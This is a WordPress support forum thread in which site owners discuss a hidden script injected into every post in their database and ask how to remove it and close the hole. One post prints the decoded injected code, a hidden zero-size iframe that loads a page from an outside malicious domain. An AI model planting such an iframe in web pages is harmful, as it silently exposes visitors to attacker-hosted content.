WordPress.org

Ready to get started?Download WordPress

Forums

Google flagged my site as malicious (6 posts)

  1. Surge
    Member
    Posted 4 years ago #

    Hi all,

    A few days ago Google and my hosting provider sent me a message that my site may contain malicious code. I found out that in each post there is a script that opens an iframe and loads a page on some domain in India but the page won't even load. My question is how do I remove this script from all the posts? I know it can be done with SQL commands but I'm too unfamiliar with them to do it. Also, will removing this script fix the issue? Or is there a bigger issue... since I don't have a clue how it got in there. I run the latest version, have no plugins, and only made a basic theme. I found the script in the wp_posts table in the post_content field. Here is the script, and thanks a lot for your help!!

    Google says this is the suspected injected code:

    [Code moderated]

  2. Surge
    Member
    Posted 4 years ago #

    Oh... in case you're curious the encoded part translates to:

    ("<iframe src
    ="http://internet-st
    at.in/includes1/in.c
    gi?4" width="0" heig
    ht="0" style="visibi
    lity:hidden"></ifram
    e>
  3. jimmyt1988
    Member
    Posted 4 years ago #

    You may already know this. Perhaps it's too much effort to go through the amount of posts you have. But say you have only 20 posts.. It might just be worth removing this code from within phpmyadmin within the databse.

    If it is something like 100 posts, It may be worth looking through sql batch commands. I'm really not sure of the specific syntax for it. Surely there is something that when run, deletes a string from each entry within a table.

    Best bet for the latter is to go onto a SQL forum. Ah, sorry it's a weak response, really hope I helped in some way.

    Other than that, if the iframe is only iframe on page. You could style it with css and say display:none; ?

  4. Surge
    Member
    Posted 4 years ago #

    Thanks anyway jimmy. I'm mostly concerned about how it got in there. If I don't patch the hole I might clean it up but it could come right back. Hopefully someone else has some insight on that. Thanks.

  5. nlaferle
    Member
    Posted 4 years ago #

    I encountered the same issue with a blog I administer. Running 2.9.2. Almost seems as though the injection occured at the DB level, as previously noted, as every record in wp_posts included the same block of code, even 'inherit' records.

  6. WP Voyager
    Member
    Posted 4 years ago #

    @sur6e: Whoever hacked your site to insert the iframe has probably left a backdoor open for himself. In other words, once he hacked it the first time, it is always easier for him to get in the next time. If you take the necessary steps to clean your installation, this should patch the hole, though.

    Check out this FAQ:
    http://codex.wordpress.org/FAQ_My_site_was_hacked

    And then have a look at the following resources:
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

    Once you are done, have a look at this Codex article to help prevent against future attacks:
    http://codex.wordpress.org/Hardening_WordPress

    And if you still have questions, the following search query should help:
    http://wordpress.org/search/hacked?documentation=1&forums=1

    I hope this is enough info :-)

    Good luck beating that hacker,
    MindBlender 3D

Topic Closed

This topic has been closed to new replies.

About this Topic